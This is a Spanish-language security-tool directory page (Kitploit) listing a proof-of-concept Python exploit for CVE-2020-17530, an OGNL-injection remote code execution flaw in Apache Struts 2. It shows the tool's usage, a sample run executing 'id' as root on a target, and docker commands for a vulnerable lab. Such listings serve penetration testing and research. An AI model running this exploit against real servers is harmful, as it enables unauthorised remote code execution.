Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-17530 — Exploit de prueba de concepto para CVE-2020-17530, una vulnerabilidad de ejecución remota de código en Apache Struts 2 mediante inyección OGNL. Incluye un script de Python para apuntar a instancias vulnerables de Struts. | Kitploit
Herramientas/GitHubGitHub/cyborgsecurity/cve-2020-17530
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingArchived
GitHubcyborgsecurity/cve-2020-17530

CVE-2020-17530

Exploit de prueba de concepto para CVE-2020-17530, una vulnerabilidad de ejecución remota de código en Apache Struts 2 mediante inyección OGNL. Incluye un script de Python para apuntar a instancias vulnerables de Struts.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
43hace 5 añosAún no revisado

CVE-2020-17530

Prueba de concepto rápida para CVE-2020-17530. En Apache Struts versiones 2.0.0 - 2.5.25, una evaluación forzada del Lenguaje de Navegación de Grafos de Objetos (OGNL) sobre la entrada de usuario sin procesar en atributos de etiquetas puede conducir a la ejecución remota de código (RCE).

root@kitploit:~
$ python CVE-2020-17530.py --help
usage: CVE-2020-17530.py [-h] [-c COMMAND] [-n NAME] [-p PORT] [-t TARGET] [-u URI]

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        command
  -n NAME, --name NAME  form data name
  -p PORT, --port PORT  port
  -t TARGET, --target TARGET
                        target
  -u URI, --uri URI     uri

$ python CVE-2020-17530.py --target 10.10.30.62 --port 8080 --uri "/index.action" --command id
uid=0(root) gid=0(root) groups=0(root)

Configuración

root@kitploit:~
$ docker pull vulhub/struts2:2.5.25
$ docker run -d -p 8080:8080 vulhub/struts2:2.5.25
Descargar herramienta